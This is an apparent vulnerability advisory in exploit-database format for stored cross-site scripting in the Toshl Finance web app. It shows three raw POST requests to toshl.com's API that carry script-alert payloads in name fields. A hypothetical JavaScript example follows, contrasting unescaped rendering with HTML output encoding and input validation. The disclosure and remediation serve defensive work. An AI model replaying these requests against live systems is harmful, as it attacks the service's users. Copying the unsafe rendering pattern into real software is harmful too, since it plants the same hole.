Toshl Finance Web Application suffers from a stored (persistent) cross-site scripting vulnerability in several name fields of its JSON API.
# Exploit Title: Toshl Finance Web Application - Multiple Areas of Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://toshl.com/app/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Area #1
Request
POST /api/tags?immediate_update=true HTTP/1.1
Host: toshl.com
{"type":"expense","name":"<script>alert('Vulnerable to XSS')</script>","category":"51076972"}
### Vulnerable Area #2
Request
POST /api/categories HTTP/1.1
Host: toshl.com
{"type":"income","name":"<script>alert('Vulnerable to XSS')</script>"}
### Vulnerable Area #3
Request
POST /api/accounts HTTP/1.1
Host: toshl.com
{"name":"<script>alert('Vulnerable to XSS')</script>","currency":{"code":"USD","rate":1,"fixed":false},"initial_balance":1000}
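All three areas share one root cause: a user-controlled `name` is stored as-is and later rendered into the page without output encoding, so the payload runs in the browser of every user who views the tag, category, or account list. The following is an added example, not Toshl's code and not part of this advisory; the rendering functions, the `validateName` check, and the stored records are hypothetical, constructed to mirror the three request bodies above and to show the vulnerable rendering pattern beside its hardened form.

```javascript
// Added illustration of the stored-XSS pattern behind the three requests above.
// Not Toshl's code: renderRowUnsafe/renderRowSafe/validateName and the records
// are hypothetical, written to demonstrate the defect and its fix.

const PAYLOAD = "<script>alert('Vulnerable to XSS')</script>";

// Constructed records that mirror the bodies sent to /api/tags, /api/categories
// and /api/accounts in the advisory.
const storedRecords = [
  { kind: "tag", name: PAYLOAD },
  { kind: "category", name: PAYLOAD },
  { kind: "account", name: PAYLOAD },
];

// Vulnerable pattern: the stored name is concatenated straight into markup.
// Assigning this string to innerHTML (or rendering it through a template with
// escaping turned off) executes the payload in every viewer's session.
function renderRowUnsafe(record) {
  return `<li class="${record.kind}">${record.name}</li>`;
}

// Contextual output encoding for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened pattern: encode at the point of output, whatever the API accepted.
// Output encoding is the control that actually stops the script from running;
// input filtering alone is routinely bypassed.
function renderRowSafe(record) {
  return `<li class="${escapeHtml(record.kind)}">${escapeHtml(record.name)}</li>`;
}

// Defense in depth on the server side: a tag/category/account name has no
// legitimate reason to contain angle brackets, so reject them at the API
// boundary in addition to escaping on output. Limits are hypothetical.
function validateName(name) {
  if (typeof name !== "string") return false;
  const trimmed = name.trim();
  if (trimmed.length === 0 || trimmed.length > 64) return false;
  return !/[<>]/.test(trimmed);
}

// The check a tester runs against rendered output: is a raw <script> tag still
// present after the name round-trips through storage and rendering?
function containsScriptTag(markup) {
  return /<script\b/i.test(markup);
}

// Walk every stored record through both renderers and report which leak.
function auditRenderers(records) {
  return records.map((r) => ({
    kind: r.kind,
    unsafeLeaks: containsScriptTag(renderRowUnsafe(r)),
    safeLeaks: containsScriptTag(renderRowSafe(r)),
    acceptedByValidator: validateName(r.name),
  }));
}

console.log(auditRenderers(storedRecords));
```

The audit shows the same payload leaking through `renderRowUnsafe` for all three record kinds and being neutralized by `renderRowSafe`; `validateName` would have refused the three request bodies in the first place, but it is a second layer, not a replacement for encoding on output.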